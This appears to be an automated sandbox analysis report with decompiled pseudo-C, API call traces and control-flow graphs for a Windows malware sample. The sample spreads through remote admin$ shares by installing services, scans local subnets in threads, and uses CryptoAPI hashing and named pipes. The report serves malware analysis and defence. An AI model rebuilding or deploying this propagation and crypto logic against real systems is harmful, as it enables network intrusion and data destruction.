                                                                                                                                                                                        0x007b967d
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x007b96a3
                                                                                                                                                                                        0x007b96a7
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x007b96b9
                                                                                                                                                                                        0x007b96bf
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x007b96bf
                                                                                                                                                                                        0x007b967d
                                                                                                                                                                                        0x007b96c8
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x007b96c8

                                                                                                                                                                                        APIs
                                                                                                                                                                                        • wsprintfW.USER32 ref: 007B957E
                                                                                                                                                                                          • Part of subcall function 007B88D3: PathFindFileNameW.SHLWAPI(007C7BC8,76B5C0B0,?,007B95B2), ref: 007B88E3
                                                                                                                                                                                        • wsprintfW.USER32 ref: 007B95C9
                                                                                                                                                                                        • wsprintfW.USER32 ref: 007B95EF
                                                                                                                                                                                        • PathFindExtensionW.SHLWAPI(?,?,?,?,?,?,?,?,?), ref: 007B95FC
                                                                                                                                                                                        • wsprintfW.USER32 ref: 007B961A
                                                                                                                                                                                        • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 007B9637
                                                                                                                                                                                        • PathFileExistsW.SHLWAPI(?), ref: 007B9649
                                                                                                                                                                                        • GetLastError.KERNEL32 ref: 007B9653
                                                                                                                                                                                        • GetLastError.KERNEL32(?), ref: 007B9674
                                                                                                                                                                                        • WNetCancelConnection2W.MPR(?,00000000,00000001), ref: 007B96B9
                                                                                                                                                                                        • OpenSCManagerW.ADVAPI32(?,00000000,000F003F,?,?), ref: 007B9714
                                                                                                                                                                                        • memset.MSVCRT ref: 007B9735
                                                                                                                                                                                        • GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 007B9742
                                                                                                                                                                                        • wsprintfW.USER32 ref: 007B975A
                                                                                                                                                                                        • CreateServiceW.ADVAPI32(?,?,00000000,000F01FF,00000010,00000003,00000000,?,00000000,00000000,00000000,00000000,00000000), ref: 007B9783
                                                                                                                                                                                        • StartServiceW.ADVAPI32(00000000,00000000,00000000), ref: 007B9798
                                                                                                                                                                                        • GetLastError.KERNEL32 ref: 007B97A6
                                                                                                                                                                                        • QueryServiceStatus.ADVAPI32(?,?), ref: 007B97D5
                                                                                                                                                                                        • Sleep.KERNEL32(00001388), ref: 007B97E7
                                                                                                                                                                                        • DeleteService.ADVAPI32(?), ref: 007B97F7
                                                                                                                                                                                        • CloseServiceHandle.ADVAPI32(?), ref: 007B9801
                                                                                                                                                                                        • GetLastError.KERNEL32 ref: 007B9809
                                                                                                                                                                                        • CloseServiceHandle.ADVAPI32(?), ref: 007B9822
                                                                                                                                                                                        • GetLastError.KERNEL32 ref: 007B982A
                                                                                                                                                                                          • Part of subcall function 007B68B5: GetProcessHeap.KERNEL32(00000008,?,76B5C0B0,00000000), ref: 007B68EB
                                                                                                                                                                                          • Part of subcall function 007B68B5: HeapAlloc.KERNEL32(00000000), ref: 007B68F4
                                                                                                                                                                                          • Part of subcall function 007B68B5: memcpy.MSVCRT ref: 007B6921
                                                                                                                                                                                          • Part of subcall function 007B68B5: GetProcessHeap.KERNEL32(00000008,?,74654D40), ref: 007B6946
                                                                                                                                                                                          • Part of subcall function 007B68B5: HeapAlloc.KERNEL32(00000000), ref: 007B6949
                                                                                                                                                                                          • Part of subcall function 007B68B5: memcpy.MSVCRT ref: 007B6978
                                                                                                                                                                                          • Part of subcall function 007B68B5: GetProcessHeap.KERNEL32(00000000,?,?), ref: 007B6995
                                                                                                                                                                                          • Part of subcall function 007B68B5: HeapFree.KERNEL32(00000000), ref: 007B6998
                                                                                                                                                                                          • Part of subcall function 007B68B5: GetProcessHeap.KERNEL32(00000000,?), ref: 007B699F
                                                                                                                                                                                          • Part of subcall function 007B68B5: HeapFree.KERNEL32(00000000), ref: 007B69A2
                                                                                                                                                                                        • DeleteFileW.KERNEL32(?), ref: 007B983E
                                                                                                                                                                                        • WNetCancelConnection2W.MPR(?,00000000,00000001), ref: 007B9857
                                                                                                                                                                                        • SetLastError.KERNEL32(00000057,00000000,00000000,00000000,?,007BA0AD,00000000,00000000,00000000,00000000,007B6AA8,00000000,00000000,00000000,00000024,007B6AA8), ref: 007B9878
                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000003.00000002.335449220.00000000007B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true
                                                                                                                                                                                        • Associated: 00000003.00000002.335320372.00000000007B0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        • Associated: 00000003.00000002.335914772.00000000007BD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        • Associated: 00000003.00000002.336086446.00000000007C3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        • Associated: 00000003.00000002.336118743.00000000007C9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_7b0000_rundll32.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: Heap$ErrorLastService$wsprintf$FileProcess$Connection2Path$AllocCancelCloseDeleteFindFreeHandleTimememcpy$CreateExistsExtensionManagerNameOpenQuerySleepStartStatusSystemmemset
                                                                                                                                                                                        • String ID: 1u$%08X%08X$W$\\%s\admin$$\\%ws\admin$\%ws$cscc.dat
                                                                                                                                                                                        • API String ID: 719309661-3806666214
                                                                                                                                                                                        • Opcode ID: 23ebc316ccabc7f65ff3b321dc4a13093417aae32e1dc40f2b38093263df2cf2
                                                                                                                                                                                        • Instruction ID: 1c410d33aed0526f724cb81d2350a77815f4264948e59b08ae24ef6b04e03393
                                                                                                                                                                                        • Opcode Fuzzy Hash: 23ebc316ccabc7f65ff3b321dc4a13093417aae32e1dc40f2b38093263df2cf2
                                                                                                                                                                                        • Instruction Fuzzy Hash: F091F7B1508385AFDB20DF64D888FDBB7E8BF85304F04492EF699D2160EB78D9448B56
                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                        • Executed
                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                        control_flow_graph 147 7b8b2e-7b8b94 call 7ba760 memset * 2 GetAdaptersInfo 150 7b8b9a-7b8bae LocalAlloc 147->150 151 7b8d2e-7b8d36 147->151 150->151 152 7b8bb4-7b8bbe GetAdaptersInfo 150->152 153 7b8d24-7b8d28 LocalFree 152->153 154 7b8bc4-7b8bcc 152->154 153->151 155 7b8bd2-7b8c12 inet_addr * 2 call 7b641a 154->155 156 7b8c77-7b8c7e call 7b7d4e 154->156 161 7b8c31-7b8c37 155->161 162 7b8c14-7b8c2a call 7b6b95 155->162 163 7b8c88-7b8c8c 156->163 164 7b8c80-7b8c83 call 7b8d39 156->164 165 7b8c69-7b8c71 161->165 166 7b8c39-7b8c4b call 7b641a 161->166 162->161 167 7b8c8e 163->167 168 7b8d0d-7b8d11 163->168 164->163 165->154 165->156 166->165 178 7b8c4d-7b8c62 call 7b6b95 166->178 172 7b8c94-7b8ca2 LocalAlloc 167->172 168->153 173 7b8d13-7b8d22 CloseHandle 168->173 176 7b8cff-7b8d0b 172->176 177 7b8ca4-7b8cc3 inet_addr 172->177 173->153 173->173 176->168 176->172 177->176 179 7b8cc5-7b8ccd 177->179 178->165 179->176 182 7b8ccf-7b8cf5 htonl * 2 CreateThread 179->182 182->176 184 7b8cf7-7b8cfb 182->184 184->176
                                                                                                                                                                                        C-Code - Quality: 67%
                                                                                                                                                                                        			E007B8B2E(intOrPtr* _a4, void* _a8, int _a16, void _a20, int _a4112, void _a4116) {
                                                                                                                                                                                        				int _v0;
                                                                                                                                                                                        				int _v4;
                                                                                                                                                                                        				signed int _v16;
                                                                                                                                                                                        				signed int _v20;
                                                                                                                                                                                        				void* _v24;
                                                                                                                                                                                        				intOrPtr _v28;
                                                                                                                                                                                        				signed int _v32;
                                                                                                                                                                                        				void* __esi;
                                                                                                                                                                                        				void* _t69;
                                                                                                                                                                                        				void* _t73;
                                                                                                                                                                                        				void* _t75;
                                                                                                                                                                                        				signed int _t77;
                                                                                                                                                                                        				signed int _t80;
                                                                                                                                                                                        				void _t81;
                                                                                                                                                                                        				void* _t84;
                                                                                                                                                                                        				void* _t93;
                                                                                                                                                                                        				void* _t100;
                                                                                                                                                                                        				struct _SECURITY_ATTRIBUTES* _t101;
                                                                                                                                                                                        				signed int _t105;
                                                                                                                                                                                        				signed int _t108;
                                                                                                                                                                                        				signed int _t109;
                                                                                                                                                                                        				void* _t110;
                                                                                                                                                                                        				intOrPtr* _t112;
                                                                                                                                                                                        				intOrPtr* _t113;
                                                                                                                                                                                        				void* _t114;
                                                                                                                                                                                        				intOrPtr* _t115;
                                                                                                                                                                                        				void* _t117;
                                                                                                                                                                                        				signed int _t122;
                                                                                                                                                                                        				void* _t125;
                                                                                                                                                                                        
                                                                                                                                                                                        				E007BA760(0x3014);
                                                                                                                                                                                        				_t101 = 0;
                                                                                                                                                                                        				_a16 = 0;
                                                                                                                                                                                        				memset( &_a20, 0, 0xffc);
                                                                                                                                                                                        				_a4112 = 0;
                                                                                                                                                                                        				memset( &_a4116, 0, 0x1ffc);
                                                                                                                                                                                        				_t115 = __imp__GetAdaptersInfo;
                                                                                                                                                                                        				_t125 = (_t122 & 0xfffffff8) + 0x18;
                                                                                                                                                                                        				_a8 = 0;
                                                                                                                                                                                        				_v4 = 0;
                                                                                                                                                                                        				_v0 = 0;
                                                                                                                                                                                        				_t69 =  *_t115(0,  &_a8, _t110, _t114, _t100); // executed
                                                                                                                                                                                        				if(_t69 != 0x6f) {
                                                                                                                                                                                        					L23:
                                                                                                                                                                                        					return 0;
                                                                                                                                                                                        				}
                                                                                                                                                                                        				_t112 = LocalAlloc(0x40, _v0);
                                                                                                                                                                                        				_a4 = _t112;
                                                                                                                                                                                        				if(_t112 == 0) {
                                                                                                                                                                                        					goto L23;
                                                                                                                                                                                        				}
                                                                                                                                                                                        				_t73 =  *_t115(_t112,  &_v0); // executed
                                                                                                                                                                                        				if(_t73 != 0) {
                                                                                                                                                                                        					L22:
                                                                                                                                                                                        					LocalFree(_v4);
                                                                                                                                                                                        					goto L23;
                                                                                                                                                                                        				}
                                                                                                                                                                                        				while(_v20 < 0x400) {
                                                                                                                                                                                        					if( *((intOrPtr*)(_t112 + 0x1a4)) != _t101) {
                                                                                                                                                                                        						_t28 = _t112 + 0x200; // 0x200
                                                                                                                                                                                        						_t93 = E007B641A(_t28);
                                                                                                                                                                                        						_v24 = _t93;
                                                                                                                                                                                        						if(_t93 != _t101) {
                                                                                                                                                                                        							E007B6B95(_t93, 0, _a4);
                                                                                                                                                                                        							HeapFree(GetProcessHeap(), _t101, _v24);
                                                                                                                                                                                        						}
                                                                                                                                                                                        					}
                                                                                                                                                                                        					_t112 =  *_t112;
                                                                                                                                                                                        					_v28 = _v28 + 1;
                                                                                                                                                                                        					if(_t112 != _t101) {
                                                                                                                                                                                        						continue;
                                                                                                                                                                                        					}
                                                                                                                                                                                        					break;
                                                                                                                                                                                        				}
                                                                                                                                                                                        				_t75 = E007B7D4E(_t103); // executed
                                                                                                                                                                                        				if(_t75 != 0) {
                                                                                                                                                                                        					E007B8D39(_a4);
                                                                                                                                                                                        				}
                                                                                                                                                                                        				if(_v20 <= _t101) {
                                                                                                                                                                                        					L20:
                                                                                                                                                                                        					if(_v16 <= _t101) {
                                                                                                                                                                                        						goto L22;
                                                                                                                                                                                        					} else {
                                                                                                                                                                                        						goto L21;
                                                                                                                                                                                        					}
                                                                                                                                                                                        					do {
                                                                                                                                                                                        						L21:
                                                                                                                                                                                        						CloseHandle( *(_t125 + 0x20 + _t101 * 4));
                                                                                                                                                                                        						_t101 =  &(_t101->nLength);
                                                                                                                                                                                        					} while (_t101 < _v16);
                                                                                                                                                                                        					goto L22;
                                                                                                                                                                                        				} else {
                                                                                                                                                                                        					_t113 = __imp__#14;
                                                                                                                                                                                        					do {
                                                                                                                                                                                        						_t77 = LocalAlloc(0x40, 0xc);
                                                                                                                                                                                        						_t117 = _t77;
                                                                                                                                                                                        						if(_t117 != _t101) {
                                                                                                                                                                                        							__imp__#11("255.255.255.255");
                                                                                                                                                                                        							_t108 = _v20;
                                                                                                                                                                                        							_t109 =  *(_t125 + 0x1024 + _t108 * 8);
                                                                                                                                                                                        							_t105 =  *(_t125 + 0x1020 + _t108 * 8) & _t109;
                                                                                                                                                                                        							if(_t105 != 0) {
                                                                                                                                                                                        								_t80 = _t77 ^ _t109 | _t105;
                                                                                                                                                                                        								_v16 = _t80;
                                                                                                                                                                                        								if(_t80 != 0) {
                                                                                                                                                                                        									_t81 =  *_t113(_t105);
                                                                                                                                                                                        									 *_t117 = _t81;
                                                                                                                                                                                        									 *((intOrPtr*)(_t117 + 4)) =  *_t113(_v20);
                                                                                                                                                                                        									 *((intOrPtr*)(_t117 + 8)) = _a4;
                                                                                                                                                                                        									_t84 = CreateThread(_t101, _t101, E007B8AB3, _t117, _t101, _t101); // executed
                                                                                                                                                                                        									if(_t84 != _t101) {
                                                                                                                                                                                        										 *(_t125 + 0x20 + _v32 * 4) = _t84;
                                                                                                                                                                                        									}
                                                                                                                                                                                        								}
                                                                                                                                                                                        							}
                                                                                                                                                                                        						}
                                                                                                                                                                                        						_v16 = _v16 + 1;
                                                                                                                                                                                        					} while (_v16 < _v20);
                                                                                                                                                                                        					goto L20;
                                                                                                                                                                                        				}
                                                                                                                                                                                        			}

































                                                                                                                                                                                        APIs
                                                                                                                                                                                        • memset.MSVCRT ref: 007B8B52
                                                                                                                                                                                        • memset.MSVCRT ref: 007B8B6F
                                                                                                                                                                                        • GetAdaptersInfo.IPHLPAPI(00000000,?), ref: 007B8B8F
                                                                                                                                                                                        • LocalAlloc.KERNEL32(00000040,?), ref: 007B8BA0
                                                                                                                                                                                        • GetAdaptersInfo.IPHLPAPI(00000000,?), ref: 007B8BBA
                                                                                                                                                                                        • inet_addr.WS2_32(000001B0), ref: 007B8BDF
                                                                                                                                                                                        • inet_addr.WS2_32(000001C0), ref: 007B8BF3
                                                                                                                                                                                          • Part of subcall function 007B641A: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,77974AB0,?), ref: 007B6439
                                                                                                                                                                                          • Part of subcall function 007B641A: GetProcessHeap.KERNEL32(00000000,00000000), ref: 007B6446
                                                                                                                                                                                          • Part of subcall function 007B641A: HeapAlloc.KERNEL32(00000000), ref: 007B644D
                                                                                                                                                                                          • Part of subcall function 007B641A: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,?), ref: 007B6465
                                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000000,?,?,000001B0), ref: 007B8C24
                                                                                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 007B8C2B
                                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000000,?,?,00000200,000001B0), ref: 007B8C5C
                                                                                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 007B8C63
                                                                                                                                                                                        • LocalAlloc.KERNEL32(00000040,0000000C), ref: 007B8C98
                                                                                                                                                                                        • inet_addr.WS2_32(255.255.255.255), ref: 007B8CA9
                                                                                                                                                                                        • htonl.WS2_32(?), ref: 007B8CD0
                                                                                                                                                                                        • htonl.WS2_32(?), ref: 007B8CD8
                                                                                                                                                                                        • CreateThread.KERNELBASE(00000000,00000000,Function_00008AB3,00000000,00000000,00000000), ref: 007B8CED
                                                                                                                                                                                        • CloseHandle.KERNEL32(?), ref: 007B8D17
                                                                                                                                                                                        • LocalFree.KERNEL32(?), ref: 007B8D28
                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000003.00000002.335449220.00000000007B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true
                                                                                                                                                                                        • Associated: 00000003.00000002.335320372.00000000007B0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000003.00000002.335914772.00000000007BD000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000003.00000002.336086446.00000000007C3000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000003.00000002.336118743.00000000007C9000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_7b0000_rundll32.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: Heap$AllocFreeLocalProcessinet_addr$AdaptersByteCharInfoMultiWidehtonlmemset$CloseCreateHandleThread
                                                                                                                                                                                        • String ID: Oet Uet0Xet$255.255.255.255
                                                                                                                                                                                        • API String ID: 698255058-1172651094
                                                                                                                                                                                        • Opcode ID: 51f2f6155b07b7292745e9c6291b6042df116d4834be31a6a84ad65410b82645
                                                                                                                                                                                        • Instruction ID: 7694b99674994e8a507da8b00b35d748acfea4aa4db3fc77cdca986bcc4a7acd
                                                                                                                                                                                        • Opcode Fuzzy Hash: 51f2f6155b07b7292745e9c6291b6042df116d4834be31a6a84ad65410b82645
                                                                                                                                                                                        • Instruction Fuzzy Hash: D8515FB1504346AFC710EF64D888EEBBBE9FB88310F14492EF595D2150DB38D945CBA6
                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                        • Executed
                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                        control_flow_graph 376 7b15a7-7b15eb GetProcessHeap HeapAlloc 377 7b173d-7b1744 376->377 378 7b15f1-7b160b CryptAcquireContextW 376->378 378->377 379 7b1611-7b161b 378->379 380 7b16be-7b16d2 CryptCreateHash 379->380 381 7b1621-7b1622 379->381 382 7b1712-7b1715 380->382 383 7b16d4 380->383 384 7b1628-7b163c GetProcessHeap HeapAlloc 381->384 385 7b1710 381->385 388 7b1720-7b1723 382->388 389 7b1717-7b171a CryptDestroyHash 382->389 386 7b16d8-7b16dc 383->386 384->385 387 7b1642-7b1676 CryptImportKey 384->387 385->382 386->382 390 7b16de-7b16f0 CryptHashData 386->390 391 7b16aa-7b16bc 387->391 392 7b1678-7b1690 CryptCreateHash 387->392 393 7b172e-7b1731 388->393 394 7b1725-7b1728 CryptDestroyKey 388->394 389->388 390->382 395 7b16f2-7b1709 CryptGetHashParam 390->395 391->386 392->391 396 7b1692-7b16a4 CryptSetHashParam 392->396 393->377 397 7b1733-7b1737 CryptReleaseContext 393->397 394->393 395->382 398 7b170b-7b170e 395->398 396->391 399 7b16a6 396->399 397->377 398->382 399->391
                                                                                                                                                                                        C-Code - Quality: 21%
                                                                                                                                                                                        			E007B15A7(intOrPtr _a4, intOrPtr _a8, void* _a12, void** _a16, intOrPtr _a20) {
                                                                                                                                                                                        				char _v8;
                                                                                                                                                                                        				long* _v12;
                                                                                                                                                                                        				signed int _v16;
                                                                                                                                                                                        				long* _v20;
                                                                                                                                                                                        				long _v24;
                                                                                                                                                                                        				char _v44;
                                                                                                                                                                                        				void* _t45;
                                                                                                                                                                                        				long** _t47;
                                                                                                                                                                                        				int _t48;
                                                                                                                                                                                        				void** _t52;
                                                                                                                                                                                        				int _t56;
                                                                                                                                                                                        				char* _t58;
                                                                                                                                                                                        				char* _t59;
                                                                                                                                                                                        				void* _t61;
                                                                                                                                                                                        				void* _t64;
                                                                                                                                                                                        				long _t70;
                                                                                                                                                                                        				int _t71;
                                                                                                                                                                                        
                                                                                                                                                                                        				_v12 = 0;
                                                                                                                                                                                        				_v20 = 0;
                                                                                                                                                                                        				_v8 = 0;
                                                                                                                                                                                        				asm("stosd");
                                                                                                                                                                                        				asm("stosd");
                                                                                                                                                                                        				asm("stosd");
                                                                                                                                                                                        				_t70 = 0x10;
                                                                                                                                                                                        				asm("stosd");
                                                                                                                                                                                        				_v24 = _t70;
                                                                                                                                                                                        				_v16 = 0xbadf00d;
                                                                                                                                                                                        				asm("stosd");
                                                                                                                                                                                        				_t45 = HeapAlloc(GetProcessHeap(), 8, _t70);
                                                                                                                                                                                        				 *_a16 = _t45;
                                                                                                                                                                                        				if(_t45 == 0) {
                                                                                                                                                                                        					L23:
                                                                                                                                                                                        					return _v16;
                                                                                                                                                                                        				}
                                                                                                                                                                                        				_t47 =  &_v12;
                                                                                                                                                                                        				__imp__CryptAcquireContextW(_t47, 0, L"Microsoft Enhanced Cryptographic Provider v1.0", 1, 0xf0000008); // executed
                                                                                                                                                                                        				if(_t47 == 0) {
                                                                                                                                                                                        					goto L23;
                                                                                                                                                                                        				}
                                                                                                                                                                                        				_t48 = 0x8002;
                                                                                                                                                                                        				_t64 = _a20 - 0x8002;
                                                                                                                                                                                        				if(_t64 == 0) {
                                                                                                                                                                                        					_t71 = 0;
                                                                                                                                                                                        					__imp__CryptCreateHash(_v12, 0x8002, 0, 0,  &_v8); // executed
                                                                                                                                                                                        					if(0x8002 == 0) {
                                                                                                                                                                                        						L17:
                                                                                                                                                                                        						if(_v8 != _t71) {
                                                                                                                                                                                        							__imp__CryptDestroyHash(_v8);
                                                                                                                                                                                        						}
                                                                                                                                                                                        						if(_v20 != _t71) {
                                                                                                                                                                                        							CryptDestroyKey(_v20);
                                                                                                                                                                                        						}
                                                                                                                                                                                        						if(_v12 != _t71) {
                                                                                                                                                                                        							CryptReleaseContext(_v12, _t71);
                                                                                                                                                                                        						}
                                                                                                                                                                                        						goto L23;
                                                                                                                                                                                        					}
                                                                                                                                                                                        					_v16 = _v16 | 0xffffffff;
                                                                                                                                                                                        					L12:
                                                                                                                                                                                        					if(_v16 == 0xffffffff) {
                                                                                                                                                                                        						__imp__CryptHashData(_v8, _a4, _a8, _t71);
                                                                                                                                                                                        						if(_t48 != 0) {
                                                                                                                                                                                        							_t52 = _a16;
                                                                                                                                                                                        							__imp__CryptGetHashParam(_v8, 2,  *_t52,  &_v24, _t71);
                                                                                                                                                                                        							if(_t52 != 0) {
                                                                                                                                                                                        								_v16 = _t71;
                                                                                                                                                                                        							}
                                                                                                                                                                                        						}
                                                                                                                                                                                        					}
                                                                                                                                                                                        					goto L17;
                                                                                                                                                                                        				}
                                                                                                                                                                                        				if(_t64 != 1) {
                                                                                                                                                                                        					L16:
                                                                                                                                                                                        					_t71 = 0;
                                                                                                                                                                                        					goto L17;
                                                                                                                                                                                        				}
                                                                                                                                                                                        				_v44 = 0x8003;
                                                                                                                                                                                        				_t61 = HeapAlloc(GetProcessHeap(), 8, 0x20);
                                                                                                                                                                                        				if(_t61 == 0) {
                                                                                                                                                                                        					goto L16;
                                                                                                                                                                                        				}
                                                                                                                                                                                        				 *(_t61 + 8) = _t70;
                                                                                                                                                                                        				 *_t61 = 0x208;
                                                                                                                                                                                        				 *((intOrPtr*)(_t61 + 4)) = 0x6602;
                                                                                                                                                                                        				asm("movsd");
                                                                                                                                                                                        				asm("movsd");
                                                                                                                                                                                        				asm("movsd");
                                                                                                                                                                                        				asm("movsd");
                                                                                                                                                                                        				_t56 = CryptImportKey(_v12, _t61, 0x20, 0, 0x100,  &_v20); // executed
                                                                                                                                                                                        				if(_t56 != 0) {
                                                                                                                                                                                        					_t58 =  &_v8;
                                                                                                                                                                                        					__imp__CryptCreateHash(_v12, 0x8009, _v20, 0, _t58);
                                                                                                                                                                                        					if(_t58 != 0) {
                                                                                                                                                                                        						_t59 =  &_v44;
                                                                                                                                                                                        						__imp__CryptSetHashParam(_v8, 5, _t59, 0);
                                                                                                                                                                                        						if(_t59 != 0) {
                                                                                                                                                                                        							_v16 = _v16 | 0xffffffff;
                                                                                                                                                                                        						}
                                                                                                                                                                                        					}
                                                                                                                                                                                        				}
                                                                                                                                                                                        				_t48 = HeapFree(GetProcessHeap(), 8, _t61);
                                                                                                                                                                                        				_t71 = 0;
                                                                                                                                                                                        				goto L12;
                                                                                                                                                                                        			}

                                                                                                                                                                                        0x007b16a4
                                                                                                                                                                                        0x007b16a6
                                                                                                                                                                                        0x007b16a6
                                                                                                                                                                                        0x007b16a4
                                                                                                                                                                                        0x007b1690
                                                                                                                                                                                        0x007b16b4
                                                                                                                                                                                        0x007b16ba
                                                                                                                                                                                        0x00000000

                                                                                                                                                                                        APIs
                                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000008,00000010,77D74620,?,74654F20), ref: 007B15D9
                                                                                                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 007B15E2
                                                                                                                                                                                        • CryptAcquireContextW.ADVAPI32(?,00000000,Microsoft Enhanced Cryptographic Provider v1.0,00000001,F0000008), ref: 007B1603
                                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000008,00000020), ref: 007B1633
                                                                                                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 007B1636
                                                                                                                                                                                        • CryptImportKey.ADVAPI32(?,00000000,00000020,00000000,00000100,?), ref: 007B166E
                                                                                                                                                                                        • CryptCreateHash.ADVAPI32(?,00008009,?,00000000,?), ref: 007B1688
                                                                                                                                                                                        • CryptSetHashParam.ADVAPI32(?,00000005,00008003,00000000), ref: 007B169C
                                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000008,00000000), ref: 007B16AD
                                                                                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 007B16B4
                                                                                                                                                                                        • CryptCreateHash.ADVAPI32(?,00008002,00000000,00000000,?), ref: 007B16CA
                                                                                                                                                                                        • CryptHashData.ADVAPI32(?,?,000000FF,00000000), ref: 007B16E8
                                                                                                                                                                                        • CryptGetHashParam.ADVAPI32(?,00000002,?,?,00000000), ref: 007B1701
                                                                                                                                                                                        • CryptDestroyHash.ADVAPI32(?), ref: 007B171A
                                                                                                                                                                                        • CryptDestroyKey.ADVAPI32(?), ref: 007B1728
                                                                                                                                                                                        • CryptReleaseContext.ADVAPI32(?,00000000), ref: 007B1737
                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000003.00000002.335449220.00000000007B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true
                                                                                                                                                                                        • Associated: 00000003.00000002.335320372.00000000007B0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000003.00000002.335914772.00000000007BD000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000003.00000002.336086446.00000000007C3000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000003.00000002.336118743.00000000007C9000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_7b0000_rundll32.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: Crypt$HashHeap$Process$AllocContextCreateDestroyParam$AcquireDataFreeImportRelease
                                                                                                                                                                                        • String ID: Oet Uet0Xet$Microsoft Enhanced Cryptographic Provider v1.0
                                                                                                                                                                                        • API String ID: 2620112963-258184132
                                                                                                                                                                                        • Opcode ID: 92b624f7cb08d38de4b621e12f5e5f7c8fe8cce749a7f5be718cf2ad0e5ca2ce
                                                                                                                                                                                        • Instruction ID: 716ada75ae5a2b285a3163fdb904b7482ec5f457b48f61ffb74ddc1faaa2340c
                                                                                                                                                                                        • Opcode Fuzzy Hash: 92b624f7cb08d38de4b621e12f5e5f7c8fe8cce749a7f5be718cf2ad0e5ca2ce
                                                                                                                                                                                        • Instruction Fuzzy Hash: A2516A71A00219BBDB219FA5DC49FEEBB79FF08750F908164F501E60A0DB788E01DBA0
                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                        • Executed
                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                        control_flow_graph 402 7b6ffe-7b7033 GetProcessHeap HeapAlloc 403 7b7039-7b7044 InitializeSecurityDescriptor 402->403 404 7b713d-7b7143 402->404 403->404 405 7b704a-7b7059 SetSecurityDescriptorDacl 403->405 405->404 406 7b705f-7b707b CreateNamedPipeW 405->406 406->406 407 7b707d-7b7087 ConnectNamedPipe 406->407 408 7b712f-7b7138 CloseHandle 407->408 409 7b708d-7b708f 407->409 408->406 410 7b7090-7b70a7 PeekNamedPipe 409->410 411 7b70b9-7b70bb 410->411 412 7b70a9-7b70ac 410->412 411->410 415 7b70bd 411->415 413 7b70bf-7b70d1 GetProcessHeap HeapAlloc 412->413 414 7b70ae-7b70b3 Sleep 412->414 416 7b711d-7b7129 FlushFileBuffers DisconnectNamedPipe 413->416 417 7b70d3-7b70ea ReadFile 413->417 414->411 415->416 416->408 418 7b70ec-7b70f2 417->418 419 7b7112-7b7116 GetProcessHeap 417->419 418->419 420 7b70f4-7b70ff StrChrW 418->420 419->416 420->419 421 7b7101-7b710d call 7b69ae 420->421 421->419
                                                                                                                                                                                        C-Code - Quality: 92%
                                                                                                                                                                                        			E007B6FFE(WCHAR* _a4) {
                                                                                                                                                                                        				void* _v8;
                                                                                                                                                                                        				long _v12;
                                                                                                                                                                                        				long _v16;
                                                                                                                                                                                        				struct _SECURITY_ATTRIBUTES _v28;
                                                                                                                                                                                        				struct _SECURITY_DESCRIPTOR* _t25;
                                                                                                                                                                                        				void* _t30;
                                                                                                                                                                                        				int _t31;
                                                                                                                                                                                        				int _t34;
                                                                                                                                                                                        				WCHAR* _t44;
                                                                                                                                                                                        				void* _t50;
                                                                                                                                                                                        				void* _t51;
                                                                                                                                                                                        
                                                                                                                                                                                        				asm("stosd");
